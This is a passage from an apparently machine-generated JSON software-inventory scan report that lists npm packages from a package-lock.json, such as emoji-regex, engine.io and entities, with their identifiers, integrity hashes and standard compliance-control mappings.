"accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:emoji-regex:emoji-regex:10.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji-regex:emoji_regex:10.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji_regex:emoji-regex:10.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji_regex:emoji_regex:10.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji:emoji-regex:10.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji:emoji_regex:10.6.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/emoji-regex@10.6.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-10.6.0.tgz", "integrity": "sha512-toUI84YS5YmxW219erniWD0CIVOo46xGKColeNQRgOzDorgBi1v4D71/OFzgD9GO2UGKIv1C3Sp8DAn0+j5w7A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "40ac25fe3302f6ab", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: emoji-regex 8.0.0", "title": "emoji-regex 8.0.0", "description": "Package discovered: emoji-regex 8.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6d4a27855f2a5940", "name": "emoji-regex", "version": "8.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:emoji-regex:emoji-regex:8.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji-regex:emoji_regex:8.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji_regex:emoji-regex:8.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji_regex:emoji_regex:8.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji:emoji-regex:8.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji:emoji_regex:8.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/emoji-regex@8.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2e49a0ba02ec88d9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: emoji-regex 9.2.2", "title": "emoji-regex 9.2.2", "description": "Package discovered: emoji-regex 9.2.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6d104925e5745212", "name": "emoji-regex", "version": "9.2.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:emoji-regex:emoji-regex:9.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji-regex:emoji_regex:9.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji_regex:emoji-regex:9.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji_regex:emoji_regex:9.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji:emoji-regex:9.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:emoji:emoji_regex:9.2.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/emoji-regex@9.2.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "dd09559c2dcfbb7e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: encodeurl 2.0.0", "title": "encodeurl 2.0.0", "description": "Package discovered: encodeurl 2.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c88c25f6c6e59773", "name": "encodeurl", "version": "2.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:encodeurl:encodeurl:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/encodeurl@2.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz", "integrity": "sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "aefcf9a0415c9a67", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: end-of-stream 1.4.5", "title": "end-of-stream 1.4.5", "description": "Package discovered: end-of-stream 1.4.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2e1781643534e89c", "name": "end-of-stream", "version": "1.4.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:end-of-stream:end-of-stream:1.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:end-of-stream:end_of_stream:1.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:end_of_stream:end-of-stream:1.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:end_of_stream:end_of_stream:1.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:end-of:end-of-stream:1.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:end-of:end_of_stream:1.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:end_of:end-of-stream:1.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:end_of:end_of_stream:1.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:end:end-of-stream:1.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:end:end_of_stream:1.4.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/end-of-stream@1.4.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", "dependencies": { "once": "^1.4.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8a726054b0a99ad6", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: engine.io 6.6.7", "title": "engine.io 6.6.7", "description": "Package discovered: engine.io 6.6.7", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "560e37438ce30be1", "name": "engine.io", "version": "6.6.7", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:socket:engine.io:6.6.7:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/engine.io@6.6.7", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/engine.io/-/engine.io-6.6.7.tgz", "integrity": "sha512-DgOngfDKM2EviOH3Mr9m7ks1q8roetLy/IMmYthAYzbpInMbYc/GS+fWFA3rl1gvwKVsQrVV61fo5emD1y3OJQ==", "dependencies": { "@types/cors": "^2.8.12", "@types/node": ">=10.0.0", "@types/ws": "^8.5.12", "accepts": "~1.3.4", "base64id": "2.0.0", "cookie": "~0.7.2", "cors": "~2.8.5", "debug": "~4.4.1", "engine.io-parser": "~5.2.1", "ws": "~8.18.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "765ac1332452cd05", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: engine.io-client 6.6.4", "title": "engine.io-client 6.6.4", "description": "Package discovered: engine.io-client 6.6.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "930ef4784cebfb4a", "name": "engine.io-client", "version": "6.6.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:socket:engine.io-client:6.6.4:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/engine.io-client@6.6.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/engine.io-client/-/engine.io-client-6.6.4.tgz", "integrity": "sha512-+kjUJnZGwzewFDw951CDWcwj35vMNf2fcj7xQWOctq1F2i1jkDdVvdFG9kM/BEChymCH36KgjnW0NsL58JYRxw==", "dependencies": { "@socket.io/component-emitter": "~3.1.0", "debug": "~4.4.1", "engine.io-parser": "~5.2.1", "ws": "~8.18.3", "xmlhttprequest-ssl": "~2.1.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b2a7fb31422c2427", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: engine.io-parser 5.2.3", "title": "engine.io-parser 5.2.3", "description": "Package discovered: engine.io-parser 5.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b307d9bc2f957b2d", "name": "engine.io-parser", "version": "5.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:engine.io-parser:engine.io-parser:5.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:engine.io-parser:engine.io_parser:5.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:engine.io_parser:engine.io-parser:5.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:engine.io_parser:engine.io_parser:5.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:engine.io:engine.io-parser:5.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:engine.io:engine.io_parser:5.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/engine.io-parser@5.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/engine.io-parser/-/engine.io-parser-5.2.3.tgz", "integrity": "sha512-HqD3yTBfnBxIrbnM1DoD6Pcq8NECnh8d4As1Qgh0z5Gg3jRRIqijury0CL3ghu/edArpUYiYqQiDUQBIs4np3Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6de5b5b314bb1d48", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: entities 4.5.0", "title": "entities 4.5.0", "description": "Package discovered: entities 4.5.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3c365deec0186b44", "name": "entities", "version": "4.5.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-2-Clause", "spdxExpression": "BSD-2-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:entities:entities:4.5.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/entities@4.5.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/entities/-/entities-4.5.0.tgz", "integrity": "sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9ebfe3f940205a55", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: es-define-property 1.0.1", "title": "es-define-property 1.0.1", "description": "Package discovered: es-define-property 1.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "198a07fe3b41a7bb", "name": "es-define-property", "version": "1.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:es-define-property:es-define-property:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": 